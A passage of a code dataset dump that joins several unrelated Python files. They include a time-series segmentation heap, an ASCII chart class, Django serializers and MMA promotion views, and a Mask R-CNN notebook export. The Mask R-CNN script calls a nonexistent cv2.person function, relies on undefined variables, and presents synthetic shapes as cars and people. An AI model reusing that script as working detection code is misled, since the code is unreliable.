__init__(self, dim, long=True, trans_cost=0.0, from_hierarch=False, **kwargs):\n self.ident = \"BU\"\n super().__init__(dim, long, trans_cost, from_hierarch)\n\n def get_name(self):\n return \"BU\"\n\n def get_params(self):\n return {\"Name\": self.get_name()}\n\n def set_data(self, data):\n super().set_data(data)\n self.data.fix_long_short(long=self.long)\n self.series = self.data.reduced\n self.pos = LinkedList()\n for idx in range(len(self.series)):\n self.pos.push_back(idx)\n self.pos.assign_vals(self.series)\n if self.dim > len(self.series):\n self.dim = len(self.series)\n return\n self.heap_create()\n\n def _optimise(self, **kwargs):\n while self.pos.size > self.dim:\n self.remove_lowest_el()\n self.pos = self.pos.make_pos_list()\n return self.pos, self.evaluate()\n\n def heap_create(self):\n ordinary_pos_list = self.pos.make_ordinary_list()\n self.node_list = [Node(link=link) for link in ordinary_pos_list[:-1]]\n self.heap = []\n for node in self.node_list:\n self.heap_insert(node)\n return self.heap\n\n def heap_insert(self, val):\n \"\"\"inserts a value into the heap\n\n Args\n val (float): value to be inserted\n returns None\n \"\"\"\n self.heap.append(val)\n val.link.heap_idx = len(self.heap) - 1\n n = len(self.heap) - 1\n self.heap_bubble_up(n)\n\n def heap_bubble_up(self, idx):\n \"\"\"Adjust value at position idx\n\n called when an adjustment must be made. idx is the array index of the element\n that was removed. this function is called when the element that replaced\n the removed element at idx is smaller than its parent\n\n Args\n idx (int): index of element to be adjusted (in heap array)\n Returns:\n None\n \"\"\"\n if idx > 0:\n parent_idx = (idx - 1)//2\n if self.heap[parent_idx] > self.heap[idx]:\n temp = self.heap[parent_idx]\n self.heap[parent_idx] = self.heap[idx]\n self.heap[idx] = temp\n self.heap[idx].link.heap_idx = idx\n self.heap[parent_idx].link.heap_idx = parent_idx\n idx = parent_idx\n self.heap_bubble_up(idx)\n\n def heap_bubble_down(self, idx):\n \"\"\"Adjust value at position idx\n\n called when an adjustment must be made. idx is the array index of the element\n that was removed. this function is called when the element that replaced\n the removed element at idx is larger than one of its children\n\n Args\n idx (int): index of element to be adjusted (in heap array)\n Returns:\n None\n \"\"\"\n child1_idx, child2_idx = 2*idx + 1, 2*idx + 2\n repl_value = float(\"inf\")\n repl_idx = None\n try:\n if self.heap[child1_idx] < self.heap[idx]:\n repl_value = self.heap[child1_idx]\n repl_idx = child1_idx\n except IndexError:\n pass\n try:\n if self.heap[child2_idx] < self.heap[idx]:\n if self.heap[child2_idx] < repl_value:\n repl_value = self.heap[child2_idx]\n repl_idx = child2_idx\n except IndexError:\n pass\n if repl_idx is not None:\n temp = self.heap[repl_idx]\n self.heap[repl_idx] = self.heap[idx]\n self.heap[idx] = temp\n self.heap[repl_idx].link.heap_idx = repl_idx\n self.heap[idx].link.heap_idx = idx\n self.heap_bubble_down(repl_idx)\n\n def heap_remove(self, idx):\n \"\"\"Remove a specific element from the heap, identified by idx\n\n Args\n idx (int): the index of the element in the heap array\n returns (Node):\n heap node that was removed\n \"\"\"\n ret_val = self.heap[idx]\n self.heap[idx] = self.heap[-1]\n self.heap[idx].link.heap_idx = idx\n del self.heap[-1]\n if idx < len(self.heap):\n if self.heap[idx] > ret_val:\n self.heap_bubble_down(idx)\n elif self.heap[idx] < ret_val:\n self.heap_bubble_up(idx)\n return ret_val\n\n def remove_lowest_el(self):\n \"\"\"Remove lowest element from the heap (the root)\n\n removes the lowest (topmost) element from the heap\n and adjusts the heap accordingly\n\n Returns:\n None\n \"\"\"\n rem_node = self.heap[0]\n if rem_node.link.next is self.pos.back:\n self.pos.del_node(rem_node.link.next)\n self.heap_remove(rem_node.link.prev.heap_idx)\n self.heap_remove(rem_node.link.heap_idx)\n self.pos.del_node(rem_node.link)\n elif rem_node.link is self.pos.root:\n self.heap_remove(rem_node.link.heap_idx)\n self.heap_remove(rem_node.link.next.heap_idx)\n self.pos.del_node(rem_node.link.next)\n self.pos.del_node(rem_node.link)\n else:\n if rem_node.link is self.pos.back:\n print (\"INVALID: rem_node.link is self.pos.back\")\n try:\n self.heap_remove(rem_node.link.heap_idx)\n self.heap_remove(rem_node.link.next.heap_idx)\n except IndexError:\n while rem_node.link is not None:\n print (rem_node.link.idx)\n print (rem_node.link.next.heap_idx)\n print (len(self.heap))\n rem_node = self.heap[rem_node.link.next.heap_idx]\n raise IndexError\n new_first_link = rem_node.link.prev\n new_2nd_link = rem_node.link.next.next\n self.pos.del_node(rem_node.link.next)\n self.pos.del_node(rem_node.link)\n new_first_link.val = abs(self.series[new_2nd_link.idx].val - self.series[\n new_first_link.idx].val)\n self.heap_bubble_down(new_first_link.heap_idx)\n\ndef main2():\n bu_obj = BU(10, long=True)\n series_obj = series.Series(series_len=5000, seed=10)\n begin_time = time.time()\n bu_obj.set_data(series_obj)\n pos, fitness = bu_obj.optimise()\n print (\"Time taken: \", time.time() - begin_time)\n ud.plot_solution(series_obj, pos, scatter=True, linewidth=2.3)\n\nif __name__ == \"__main__\":\n main2()","sub_path":"cycle_dating/Algos/bottom_up.py","file_name":"bottom_up.py","file_ext":"py","file_size_in_byte":7767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"65027786","text":"#!/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\n\n__updated__ = '2018-02-26 22:55:39'\n\nimport collections\n\n\n'''\n Python3.6 AsciiChart and AsciiChartCfg classes are based on https://github.com/kroitor/asciichart\n'''\n\n\nclass AsciiChart(object):\n\n default_format = '{:+.2f}'\n default_offset = 3\n\n def __init__(self, format=default_format, offset=default_offset):\n if not isinstance(format, str):\n raise TypeError\n if not isinstance(offset, int):\n raise TypeError\n self.format = format if format is not None else AsciiChart.default_format\n self.offset = max(offset, 3) if offset is not None else AsciiChart.default_offset\n\n def compute_buffer(self, seq, height=None, padding=0):\n if isinstance(seq, str):\n raise TypeError\n if not isinstance(seq, collections.Sequence):\n raise TypeError\n\n minimum = min(seq)\n maximum = max(seq)\n label_length = max(\n len(self.format.format(minimum)),\n len(self.format.format(maximum)),\n int(padding),\n 0\n )\n\n min_max_range = float(abs(maximum - minimum))\n if height is None:\n height = min_max_range\n else:\n height = float(height)\n\n ratio = height / min_max_range\n minimum2 = int(minimum * ratio)\n maximum2 = int(maximum * ratio)\n rows = abs(maximum2 - minimum2)\n offset = 3 # label, whitespace, axis\n width = len(seq) + offset\n\n # init with whitespace\n result = [[' ' for col in range(0, width)] for row in range(0, rows+1)]\n\n # init label and axis\n for y in range(minimum2, maximum2+1):\n label = ('{:>' + str(label_length) + '}').format(\n self.format.format(maximum - (y - minimum2) * min_max_range / rows)\n )\n result[y - minimum2][0] = label\n result[y - minimum2][2] = '┼' if y == 0 else '┤'\n\n # first value\n y0 = int(next(iter(seq)) * ratio) - minimum2\n result[rows - y0][2] = '┼'\n\n # the line\n for x in range(0, len(seq)-1):\n y0 = int(seq[x+0] * ratio) - minimum2\n y1 = int(seq[x+1] * ratio) - minimum2\n if y0 == y1:\n result[rows - y0][x + offset] = '─'\n else:\n result[rows - y1][x + offset] = '╰' if y0 > y1 else '╭'\n result[rows - y0][x + offset] = '╮' if y0 > y1 else '╯'\n for y in range(min(y0, y1)+1, max(y0, y1)):\n result[rows - y][x + offset] = '│'\n\n return result\n\n def compute_plot(self, seq, height=None, padding=0):\n result = self.compute_buffer(seq, height=height, padding=padding)\n return '\\n'.join(''.join(row) for row in result)\n","sub_path":"nanopooltool/ascii_chart.py","file_name":"ascii_chart.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"216580844","text":"from .models import Person, Employee\nfrom rest_framework import serializers\n\n\nclass PersonSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n class Meta:\n model = Person\n fields = ['id', 'last_name', 'first_name', 'birth_date']\n\n\nclass EmployeeSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n person = PersonSerializer(many=False, read_only=False)\n class Meta:\n model = Employee\n fields = ['id', 'employee_num', 'employee_date', 'terminated_date', 'person']\n def create(self, validated_data):\n person = Person(last_name=validated_data.get('person').get('last_name'), first_name=validated_data.get('person').get('first_name'), birth_date=validated_data.get('person').get('birth_date'))\n person.save()\n employee = Employee.objects.create(person=person, employee_num=validated_data.get('employee_num'), employee_date=validated_data.get('employee_date'), terminated_date=validated_data.get('terminated_date'))\n employee.save()\n return employee\n def update(self, instance, validated_data):\n employee = Employee.objects.get(id=instance.id)\n employee.employee_num = validated_data.get('employee_num')\n employee.employee_date = validated_data.get('employee_date')\n employee.terminated_date = validated_data.get('terminated_date')\n person = Person.objects.get(id=employee.person.id)\n person.first_name = validated_data.get('person').get('first_name')\n person.last_name = validated_data.get('person').get('last_name')\n person.birth_date = validated_data.get('person').get('birth_date')\n person.save()\n employee.person = person\n employee.save()\n return employee\n","sub_path":"backend/employees/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"561115480","text":"from django.db import models\nfrom django.forms import ModelForm\nimport django_tables2 as tables\nfrom .vacations import Vacations\nfrom datetime import datetime\n\nclass Date(models.Model):\n vacation_id = models.ForeignKey(Vacations,on_delete=models.CASCADE)\n date = models.DateField(blank=False,default=datetime.now)\n date_id = models.AutoField(null=True,primary_key=True)\n\n\n def __str__(self):\n attributes = []\n for attribute in self._meta.get_fields():\n attributes.append(getattr(self,str(attribute),''))\n return ' '.join(attributes)\n\nclass DateForm(ModelForm):\n class Meta:\n model = Date\n exclude = ['vacation_id']\n\nclass DateTable(tables.Table):\n select_dates = tables.CheckBoxColumn(accessor = 'pk', attrs = { \"th__input\": {\"onclick\": \"toggle_date(this)\"}}, orderable=False)\n class Meta:\n model = Date\n exclude = ('vacation_id','date_id')\n\nclass DateTable_esp(tables.Table):\n fecha = tables.TemplateColumn('{{record.date}}')\n select_dates = tables.CheckBoxColumn(accessor = 'pk', attrs = { \"th__input\": {\"onclick\": \"toggle_date(this)\"}}, orderable=False)\n class Meta:\n model = Date\n exclude = ('vacation_id','date_id','date')\n\n","sub_path":"hound_app/hound/models/date.py","file_name":"date.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"321296438","text":"# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\nfrom .client import CertificateClient\nfrom .enums import ActionType, KeyCurveName, KeyType, SecretContentType, KeyUsageType\nfrom .models import AdministratorDetails, CertificatePolicy, Contact, LifetimeAction\n\n__all__ = [\n \"ActionType\",\n \"AdministratorDetails\",\n \"CertificateClient\",\n \"CertificatePolicy\",\n \"Contact\",\n \"KeyCurveName\",\n \"KeyType\",\n \"KeyUsageType\",\n \"LifetimeAction\",\n \"SecretContentType\",\n]\n","sub_path":"sdk/keyvault/azure-keyvault-certificates/azure/keyvault/certificates/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"364905804","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\nimport os \nimport sys\nimport random\nimport math\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport json\nimport pydicom\nfrom imgaug import augmenters as iaa\nfrom tqdm import tqdm\nimport pandas as pd \nimport glob\n\n#sys.path.append(os.path.join(ROOT_DIR, 'Mask_RCNN')) \nfrom mrcnn.config import Config\nfrom mrcnn import utils\nimport mrcnn.model as modellib\nfrom mrcnn import visualize\nfrom mrcnn.model import log\n\n\n# In[2]:\n\n\n#train_dicom_dir = os.path.join(DATA_DIR, 'train_images')\n#test_dicom_dir = os.path.join(DATA_DIR, 'test_images')\n\n\n# In[5]:\n\n\n# load data\ntrain_dicom_dir\ntest_dicom_dir\n\n\n# In[6]:\n\n\nCOCO_WEIGHTS_PATH = \"mask_rcnn_coco.h5\"\n\n\n# In[7]:\n\n\nclass autoConfig(Config):\n NAME = \"auto\"\n GPU_COUNT = 1\n IMAGES_PER_GPU = 8\n NUM_CLASSES = 1 + 3 \n IMAGE_MIN_DIM = 128\n IMAGE_MAX_DIM = 128\n RPN_ANCHOR_SCALES = (8, 16, 32, 64, 128) \n TRAIN_ROIS_PER_IMAGE = 8\n STEPS_PER_EPOCH = 10\n \nconfig = autoConfig()\nconfig.display()\n\n\n# In[8]:\n\n\nclass autoDataset(utils.Dataset):\n def load_auto(self, count, height, width):\n # Add classes\n self.add_class(\"auto\", 1, \"car\")\n self.add_class(\"auto\", 2, \"person\")\n self.add_class(\"auto\", 3, \"traffic\")\n\n # Add images\n for i in range(count):\n bg_color, auto = self.random_image(height, width)\n self.add_image(\"auto\", image_id=i, path=None,\n width=width, height=height,\n bg_color=bg_color, auto=auto)\n\n def load_image(self, image_id):\n info = self.image_info[image_id]\n bg_color = np.array(info['bg_color']).reshape([1, 1, 3])\n image = np.ones([info['height'], info['width'], 3], dtype=np.uint8)\n image = image * bg_color.astype(np.uint8)\n for shape, color, dims in info['auto']:\n image = self.draw_shape(image, shape, dims, color)\n return image\n\n def image_reference(self, image_id):\n info = self.image_info[image_id]\n if info[\"source\"] == \"auto\":\n return info[\"auto\"]\n else:\n super(self.__class__).image_reference(self, image_id)\n\n def load_mask(self, image_id):\n info = self.image_info[image_id]\n auto = info['auto']\n count = len(auto)\n mask = np.zeros([info['height'], info['width'], count], dtype=np.uint8)\n for i, (shape, _, dims) in enumerate(info['auto']):\n mask[:, :, i:i+1] = self.draw_shape(mask[:, :, i:i+1].copy(),\n shape, dims, 1)\n # Handle occlusions\n occlusion = np.logical_not(mask[:, :, -1]).astype(np.uint8)\n for i in range(count-2, -1, -1):\n mask[:, :, i] = mask[:, :, i] * occlusion\n occlusion = np.logical_and(occlusion, np.logical_not(mask[:, :, i]))\n # Map class names to class IDs.\n class_ids = np.array([self.class_names.index(s[0]) for s in auto])\n return mask.astype(np.bool), class_ids.astype(np.int32)\n\n def draw_shape(self, image, shape, dims, color):\n # Get the center x, y and the size s\n x, y, s = dims\n if shape == 'car':\n cv2.rectangle(image, (x-s, y-s), (x+s, y+s), color, -1)\n elif shape == \"person\":\n cv2.person(image, (x, y), s, color, -1)\n elif shape == \"traffic\":\n points = np.array([[(x, y-s),\n (x-s/math.sin(math.radians(60)), y+s),\n (x+s/math.sin(math.radians(60)), y+s),\n ]], dtype=np.int32)\n cv2.fillPoly(image, points, color)\n return image\n\n def random_shape(self, height, width):\n # auto\n shape = random.choice([\"car\", \"person\", \"traffic\"])\n # Color\n color = tuple([random.randint(0, 255) for _ in range(3)])\n # Center x, y\n buffer = 20\n y = random.randint(buffer, height - buffer - 1)\n x = random.randint(buffer, width - buffer - 1)\n # Size\n s = random.randint(buffer, height//4)\n return shape, color, (x, y, s)\n\n def random_image(self, height, width):\n bg_color = np.array([random.randint(0, 255) for _ in range(3)])\n # Generate a few random auto and record their\n # bounding boxes\n auto = []\n boxes = []\n N = random.randint(1, 4)\n for _ in range(N):\n shape, color, dims = self.random_shape(height, width)\n auto.append((shape, color, dims))\n x, y, s = dims\n boxes.append([y-s, x-s, y+s, x+s])\n keep_ixs = utils.non_max_suppression(np.array(boxes), np.arange(N), 0.3)\n auto = [s for i, s in enumerate(auto) if i in keep_ixs]\n return bg_color, auto\n\n\n# In[11]:\n\n\ndataset_train = autoDataset()\ndataset_train.load_auto(500, config.IMAGE_SHAPE[0], config.IMAGE_SHAPE[1])\ndataset_train.prepare()\ndataset_val = autoDataset()\ndataset_val.load_auto(50, config.IMAGE_SHAPE[0], config.IMAGE_SHAPE[1])\ndataset_val.prepare()\nimage_ids = np.random.choice(dataset_train.image_ids, 4)\nfor image_id in image_ids:\n image = dataset_train.load_image(image_id)\n mask, class_ids = dataset_train.load_mask(image_id)\n visualize.display_top_masks(image, mask, class_ids, dataset_train.class_names)\n\n\n# In[10]:\n\n\n# Create model in training mode\nmodel = modellib.MaskRCNN(mode=\"training\", config=config,\n model_dir=MODEL_DIR)\nmodel.load_weights(COCO_MODEL_PATH, by_name=True,exclude=[\"mrcnn_class_logits\", \"mrcnn_bbox_fc\", \"mrcnn_bbox\", \"mrcnn_mask\"])\n\n# Train the head branches\nmodel.train(dataset_train, dataset_val, \n learning_rate=config.LEARNING_RATE, \n epochs=1, \n layers='heads')\n# Save weights\n# model_path = os.path.join(MODEL_DIR, \"mask_rcnn_shapes.h5\")\n# model.keras_model.save_weights(model_path)\nhistory = model.keras_model.history.history\n\n\n# In[14]:\n\n\nclass InferenceConfig(autoConfig):\n GPU_COUNT = 1\n IMAGES_PER_GPU = 1\n\ninference_config = InferenceConfig()\n\nmodel = modellib.MaskRCNN(mode=\"inference\", \n config=inference_config,\n model_dir=MODEL_DIR)\nmodel_path = model.find_last()\n#print(\"Loading weights from \", model_path)\nmodel.load_weights(model_path, by_name=True)\nhistory = model.keras_model.history.history\n\n\n# In[17]:\n\n\n# Test on a random image\nimage_id = random.choice(dataset_val.image_ids)\noriginal_image, image_meta, gt_class_id, gt_bbox, gt_mask = modellib.load_image_gt(dataset_val, inference_config, \n image_id, use_mini_mask=False)\n\nlog(\"original_image\", original_image)\nlog(\"image_meta\", image_meta)\nlog(\"gt_class_id\", gt_class_id)\nlog(\"gt_bbox\", gt_bbox)\nlog(\"gt_mask\", gt_mask)\n\nvisualize.display_instances(original_image, gt_bbox, gt_mask, gt_class_id, \n dataset_train.class_names, figsize=(8, 8))\n\n\n# In[20]:\n\n\nresults = model.detect([original_image], verbose=1)\nr = results[0]\nvisualize.display_instances(original_image, r['rois'], r['masks'], r['class_ids'], \n dataset_val.class_names, r['scores'], ax=get_ax())\n\n\n# In[22]:\n\n\nplt.figure(figsize=(8,4))\nplt.subplot(131)\nplt.plot(epochs, history[\"loss\"], label=\"Test loss\")\nplt.legend()\nplt.show()\n\n\n# In[23]:\nplt.figure(figsize=(8,4))\nplt.subplot(131)\nplt.plot(epochs, history[\"accuracy\"], label=\"Test accuracy\")\nplt.legend()\nplt.show()\n\n\n\n\n\n\n","sub_path":"Code/Mask-R-CNN.py","file_name":"Mask-R-CNN.py","file_ext":"py","file_size_in_byte":7467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"440703032","text":"import pygame\n\nfrom math import sqrt\nfrom random import random, randint\n\ndef load_png(name):\n \"\"\" Load image and return image object\"\"\"\n try:\n img = pygame.image.load(name)\n except:\n raise SystemExit('Cannot load image: %s' % name)\n\n if img.get_alpha() is None:\n img = img.convert()\n else:\n img = img.convert_alpha()\n\n return img, img.get_rect()\n\n\ndef get_random_colour():\n r = randint(0, 255)\n g = randint(0, 255)\n b = randint(0, 255)\n return (r, g, b)\n\n\ndef dist(p1, p2):\n return sqrt((p1[0] - p2[0])**2 + (p1[1]-p2[1])**2)\n","sub_path":"Missão/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"85508780","text":"from django.contrib import messages\r\nfrom django.contrib.auth import login\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.db import transaction\r\nfrom django.db.models import Avg, Count\r\nfrom django.forms import inlineformset_factory\r\nfrom django.shortcuts import get_object_or_404, redirect, render\r\nfrom django.urls import reverse, reverse_lazy\r\nfrom django.utils.decorators import method_decorator\r\nfrom django.views.generic import (CreateView, DeleteView, DetailView, ListView,\r\n UpdateView)\r\nfrom django.db.models import Q\r\n\r\nfrom ..decorators import promotion_required\r\nfrom ..forms import PromotionSignUpForm, BoutForm, FightForm\r\nfrom ..models import User, Event, Bout, Fighter, FightOffer, FinishedFight\r\n\r\n\r\nclass PromotionSignUpView(CreateView):\r\n model = User\r\n form_class = PromotionSignUpForm\r\n template_name = 'registration/signup_form.html'\r\n\r\n def get_context_data(self, **kwargs):\r\n kwargs['user_type'] = 'promotion'\r\n return super().get_context_data(**kwargs)\r\n\r\n def form_valid(self, form):\r\n user = form.save()\r\n login(self.request, user)\r\n return redirect('promotions:promotion_home')\r\n\r\n\r\n@method_decorator([login_required, promotion_required], name='dispatch')\r\nclass PromotionHomeView(ListView):\r\n model = User\r\n ordering = ('name',)\r\n context_object_name = 'promotions'\r\n template_name = 'ammamanager/promotions/promotion_home.html'\r\n\r\n\r\n@login_required\r\n@promotion_required\r\ndef promotion_home(request,*args, **kwargs):\r\n fights = FinishedFight.objects.all().filter(event__owner = request.user)\r\n ko = 0\r\n sub = 0\r\n dec = 0\r\n draw = 0\r\n nc = 0\r\n flw = 0\r\n bw = 0\r\n fw = 0\r\n lw = 0\r\n ww = 0\r\n mw = 0\r\n lhw = 0\r\n hw = 0\r\n for f in fights:\r\n if f.method == 'KO':\r\n ko += 1\r\n elif f.method == 'SUB':\r\n sub += 1\r\n elif f.method == 'DEC':\r\n dec += 1\r\n elif f.method == 'DRAW':\r\n draw += 1\r\n elif f.method == 'NC':\r\n nc += 1\r\n if f.bout.weight == 'FLW':\r\n flw += 1\r\n elif f.bout.weight == 'BW':\r\n bw += 1\r\n elif f.bout.weight == 'FW':\r\n fw += 1\r\n elif f.bout.weight == 'LW':\r\n lw += 1\r\n elif f.bout.weight == 'WW':\r\n ww += 1\r\n elif f.bout.weight == 'MW':\r\n mw += 1\r\n elif f.bout.weight == 'LHW':\r\n lhw += 1\r\n elif f.bout.weight == 'HW':\r\n hw += 1\r\n\r\n return render(request, 'ammamanager/promotions/promotion_home.html', {\r\n 'KO' : ko,\r\n 'SUB' : sub,\r\n 'DEC' : dec,\r\n 'DRAW': draw,\r\n 'NC': nc,\r\n 'flw': flw,\r\n 'bw': bw,\r\n 'fw': fw,\r\n 'lw': lw,\r\n 'ww': ww,\r\n 'mw': mw,\r\n 'lhw': lhw,\r\n 'hw': hw\r\n })\r\n\r\n\r\n@method_decorator([login_required, promotion_required], name='dispatch')\r\nclass ListEventsView(ListView):\r\n model = Event\r\n ordering = ('name', )\r\n context_object_name = 'events'\r\n template_name = 'ammamanager/promotions/event_list_finished.html'\r\n def get_queryset(self):\r\n queryset = self.request.user.events.order_by('-id').filter(finished= True)\r\n return queryset\r\n\r\n@method_decorator([login_required, promotion_required], name='dispatch')\r\nclass ListEventsUpcomingView(ListView):\r\n model = Event\r\n ordering = ('name', )\r\n context_object_name = 'events'\r\n template_name = 'ammamanager/promotions/event_list.html'\r\n def get_queryset(self):\r\n queryset = self.request.user.events.order_by('-id').filter(finished= False)\r\n return queryset\r\n\r\n@method_decorator([login_required, promotion_required], name='dispatch')\r\nclass EventCreateView(CreateView):\r\n model = Event\r\n fields = ('name','date',)\r\n template_name = 'ammamanager/promotions/event_add_form.html'\r\n\r\n def form_valid(self, form):\r\n event = form.save(commit=False)\r\n event.owner = self.request.user\r\n event.save()\r\n messages.success(self.request, 'Event Successfully Added!!')\r\n return redirect('promotions:event_list')\r\n\r\n\r\n@method_decorator([login_required, promotion_required], name='dispatch')\r\nclass EventView(UpdateView):\r\n model = Event\r\n fields = ('name',)\r\n context_object_name = 'event'\r\n template_name = 'ammamanager/promotions/event.html'\r\n\r\n def get_context_data(self, **kwargs):\r\n kwargs['bouts'] = self.get_object().bouts.annotate(answers_count=Count('weight'))\r\n return super().get_context_data(**kwargs)\r\n\r\n def get_queryset(self):\r\n return self.request.user.events.all()\r\n\r\n def get_success_url(self):\r\n return reverse('promotions:event', kwargs={'pk': self.object.pk})\r\n\r\n@login_required\r\n@promotion_required\r\ndef finished_event(request, pk):\r\n event = get_object_or_404(Event, pk=pk, owner=request.user)\r\n bouts = Bout.objects.all().filter(event=event)\r\n finished = FinishedFight.objects.all().filter(event=event)\r\n\r\n return render(request, 'ammamanager/promotions/finished_event.html', {\r\n 'event': event,\r\n 'bouts': bouts,\r\n 'finished': finished\r\n })\r\n\r\n@login_required\r\n@promotion_required\r\ndef event(request, pk):\r\n event = get_object_or_404(Event, pk=pk, owner=request.user)\r\n bouts = Bout.objects.all().filter(event=event)\r\n finbouts = Bout.objects.all().filter(event=event).filter(set=True).filter(completed=False)\r\n finished = FinishedFight.objects.all().filter(event=event)\r\n if event.finished == False:\r\n return render(request, 'ammamanager/promotions/event.html', {\r\n 'event': event,\r\n 'bouts': bouts,\r\n 'finished': finished\r\n })\r\n else:\r\n return render(request, 'ammamanager/promotions/finished_event.html', {\r\n 'event': event,\r\n 'finbouts': finbouts,\r\n 'finished': finished\r\n })\r\n\r\n\r\n@login_required\r\n@promotion_required\r\ndef bout_add(request, pk):\r\n\r\n event = get_object_or_404(Event, pk=pk, owner=request.user)\r\n\r\n if request.method == 'POST':\r\n form = BoutForm(request.POST)\r\n if form.is_valid():\r\n bout = form.save(commit=False)\r\n bout.event = event\r\n bout.fighter1 = None\r\n bout.fighter2 = None\r\n bout.save()\r\n messages.success(request, 'You may now add fighters to the bout.')\r\n return redirect('promotions:event', event.pk)\r\n else:\r\n form = BoutForm()\r\n\r\n return render(request, 'ammamanager/promotions/bout_add_form.html', {'event': event, 'form': form})\r\n\r\n\r\n\r\n\r\n\r\n@login_required\r\n@promotion_required\r\ndef BoutView(request, pk, bout_pk, *args, **kwargs):\r\n\r\n event = get_object_or_404(Event, pk=pk, owner=request.user)\r\n bout = get_object_or_404(Bout, pk=bout_pk, event=event)\r\n fighters = Fighter.objects.all().filter(weight=bout.weight).filter(available = True)\r\n recfighterstemp = None;\r\n if bout.fighter1 is not None:\r\n fighters = fighters.exclude(pk=bout.fighter1.pk)\r\n recfighterstemp = fighters.filter(Q(rank=bout.fighter1.rank + 1) | Q(rank=bout.fighter1.rank - 1))\r\n\r\n query = request.GET.get(\"q\", None)\r\n if query is not None:\r\n fighters = fighters.filter(fname__icontains=query)\r\n\r\n return render(request, 'ammamanager/promotions/bout.html', {\r\n 'event': event,\r\n 'bout' : bout,\r\n 'fighters' : fighters,\r\n 'rec' : recfighterstemp\r\n })\r\n\r\n\r\n@login_required\r\n@promotion_required\r\ndef offer(request, pk, bout_pk, fighter_pk, *args, **kwargs):\r\n\r\n event = get_object_or_404(Event, pk=pk, owner=request.user)\r\n bout = get_object_or_404(Bout, pk=bout_pk, event=event)\r\n fighter = get_object_or_404(Fighter, pk=fighter_pk)\r\n\r\n if (bout.fighter1 == None):\r\n bout.fighter1 = fighter\r\n\r\n elif (bout.fighter2 == None):\r\n bout.fighter2 = fighter\r\n\r\n else:\r\n messages.success(request, 'There are no spaces left in the bout. Please remove a fighter')\r\n bout.save()\r\n\r\n return redirect('promotions:bout', event.pk, bout.pk)\r\n\r\n\r\n@login_required\r\n@promotion_required\r\ndef removeFighters(request, pk, bout_pk, *args, **kwargs):\r\n\r\n event = get_object_or_404(Event, pk=pk, owner=request.user)\r\n bout = get_object_or_404(Bout, pk=bout_pk, event=event)\r\n\r\n bout.fighter1 = None\r\n\r\n bout.fighter2 = None\r\n\r\n bout.save()\r\n\r\n return redirect('promotions:bout', event.pk, bout.pk)\r\n\r\n@login_required\r\n@promotion_required\r\ndef offer_fight(request, pk, bout_pk, *args, **kwargs):\r\n\r\n event = get_object_or_404(Event, pk=pk, owner=request.user) #Doesnt seem right\r\n bout = get_object_or_404(Bout, pk=bout_pk, event=event)\r\n f1 = bout.fighter1\r\n f2 = bout.fighter2\r\n if f1 is not None and f2 is not None:\r\n offer1 = FightOffer(fighter = f1, opponent = f2, event = event, bout = bout)\r\n offer1.save()\r\n\r\n return redirect('promotions:event', event.pk)\r\n\r\n\r\n@login_required\r\n@promotion_required\r\ndef finished_bout(request, pk, bout_pk, fighter_pk):\r\n bout = get_object_or_404(Bout, pk=bout_pk)\r\n event = bout.event\r\n winner = get_object_or_404(Fighter, pk=fighter_pk)\r\n if bout.fighter1 == winner:\r\n loser = bout.fighter2\r\n else:\r\n loser = bout.fighter1\r\n\r\n if request.method == 'POST':\r\n form = FightForm(request.POST)\r\n if form.is_valid():\r\n fight = form.save(commit=False)\r\n if fight.method == 'Draw':\r\n return redirect('promotions:draw_bout', bout.event.pk, bout.pk)\r\n if fight.method == 'NC':\r\n return redirect('promotions:nc_bout', bout.event.pk, bout.pk)\r\n fight.bout = bout\r\n fight.winner = winner\r\n fight.loser = loser\r\n fight.event = event\r\n fight.save()\r\n fight.bout.completed = True\r\n fight.bout.save()\r\n\r\n winner.wins = winner.wins + 1\r\n loser.losses = loser.losses + 1\r\n winner.available = True\r\n loser.available = True\r\n winner.save()\r\n loser.save()\r\n set_fight_scores(fight.id)\r\n score_fighters()\r\n ranking(bout.weight)\r\n messages.success(request, 'Records Updated')\r\n return redirect('promotions:event', event.pk)\r\n else:\r\n form = FightForm()\r\n\r\n return render(request, 'ammamanager/promotions/bout_add_form.html', {'event': event, 'form': form})\r\n\r\n\r\ndef draw_bout(request, pk, bout_pk):\r\n bout = get_object_or_404(Bout, pk=bout_pk)\r\n fin = FinishedFight(bout=bout,event = bout.event, winner = bout.fighter1, loser = bout.fighter2, method = 'DRAW', round = 5, min = 5, sec = 0, winnerPoints = 0, loserPoints = 0)\r\n fin.winner.draws +=1\r\n fin.winner.available = True\r\n fin.loser.draws += 1\r\n fin.loser.available = True\r\n fin.winner.save()\r\n fin.loser.save()\r\n fin.save()\r\n bout.completed = True\r\n bout.save()\r\n return redirect('promotions:event', bout.event.pk)\r\n\r\n\r\ndef nc_bout(request, pk, bout_pk):\r\n bout = get_object_or_404(Bout, pk=bout_pk)\r\n fin = FinishedFight(bout=bout,event = bout.event, winner = bout.fighter1, loser = bout.fighter2, method = 'NC', round = 0, min = 0, sec = 0, winnerPoints = 0, loserPoints = 0)\r\n fin.winner.nc += 1\r\n fin.winner.available = True\r\n fin.loser.nc += 1\r\n fin.loser.available = True\r\n fin.winner.save()\r\n 